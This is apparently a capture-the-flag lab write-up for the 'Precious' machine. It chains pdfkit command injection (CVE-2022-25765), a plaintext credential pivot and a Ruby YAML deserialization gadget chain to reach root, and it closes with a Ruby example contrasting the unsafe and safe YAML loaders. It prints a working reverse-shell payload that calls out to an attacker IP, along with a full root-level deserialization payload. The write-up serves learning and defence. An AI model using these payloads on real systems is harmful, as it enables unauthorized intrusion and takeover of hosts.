About Precious

  • Precious is an Easy difficulty Linux machine that focuses on the Ruby language.
  • It hosts a custom Ruby web application, using an outdated library, namely pdfkit, which is vulnerable to CVE-2022-25765, leading to an initial shell on the target machine.
  • After a pivot using plaintext credentials that are found in a Gem repository config file, the box concludes with an insecure deserialization attack on a custom, outdated, Ruby script.

Scanning

Port scanning with nmap

Add the hostname from the scan to /etc/hosts.

Foothold

The web page offers a Convert Web Page to PDF function.


After submitting a URL, a PDF file is downloaded.

Running exiftool on the PDF shows that it was generated by pdfkit v0.8.6.

This version is vulnerable to command injection (CVE-2022-25765), which gives remote code execution.

Payload:

http://%20`{command}`

We can use this payload to get a reverse shell:

http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`

Reference: https://www.revshells.com/

We get a shell as user ruby.


Escalating Privileges

There are two users in the /home directory.


The user flag is in henry's home directory, but it is not readable by ruby.

Inside ruby's home directory there is a config file under .bundle, and it contains the password of user henry in plaintext.


We can use this password to SSH in as henry.

This user can run /opt/update_dependencies.rb as root with sudo.


The script itself is not writable. Looking at the code, we see that it uses YAML.load, which resolves Ruby object tags and is therefore vulnerable to an insecure deserialization attack.


We can write our own dependencies.yml, which the script loads.

Payload:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve

Reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

Now we run the script with sudo; the command in git_set is executed as root and prints the root flag.

sudo /usr/bin/ruby /opt/update_dependencies.rb

This gives the root flag.
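To show why the YAML.load in update_dependencies.rb is the root cause, and what the fix looks like, here is an added example (not code from the box or from the original writeup). It loads a constructed benign dependencies.yml and a constructed file carrying a !ruby/object tag, first with the tag-resolving loader the script uses and then with YAML.safe_load; the Dependency class is a harmless stand-in for the Gem::* gadgets in the payload above.

```ruby
require 'yaml'

# Harmless stand-in for the Gem::* gadgets used in the payload: the point is
# that the YAML text, not the program, decides which class gets instantiated.
class Dependency
  attr_reader :name, :version
  def initialize(name, version)
    @name = name
    @version = version
  end
end

# Constructed sample: what a legitimate dependencies.yml looks like.
BENIGN_YAML = <<~YAML
  - name: rails
    version: "7.0.4"
  - name: pdfkit
    version: "0.8.6"
YAML

# Constructed sample: an object tag like the ones in the payload above.
TAGGED_YAML = <<~YAML
  - !ruby/object:Dependency
    name: injected
    version: "0"
YAML

# The vulnerable pattern from update_dependencies.rb. On Psych < 4 this is
# plain YAML.load; Psych 4 moved the tag-resolving behaviour to unsafe_load.
def load_unsafe(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Hardened replacement: safe_load only permits scalars, arrays and hashes
# (and rejects aliases by default, so the &1 anchors above fail as well).
# An object tag raises Psych::DisallowedClass instead of instantiating anything.
def load_safe(text)
  YAML.safe_load(text)
end

# Loads the text with the named loader and reports the class of the first
# entry, or 'rejected' when the safe loader refuses the document.
def first_entry_class(loader, text)
  send(loader, text).first.class.name
rescue Psych::DisallowedClass
  'rejected'
end

if __FILE__ == $PROGRAM_NAME
  %i[load_unsafe load_safe].each do |loader|
    puts "#{loader}: benign=#{first_entry_class(loader, BENIGN_YAML)} " \
         "tagged=#{first_entry_class(loader, TAGGED_YAML)}"
  end
end
```

The unsafe loader turns the tagged file into a Dependency instance without ever calling the program's own constructor, which is exactly the hook the Gem::* chain abuses; safe_load keeps the benign file working while refusing the tagged one.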

Happy Hacking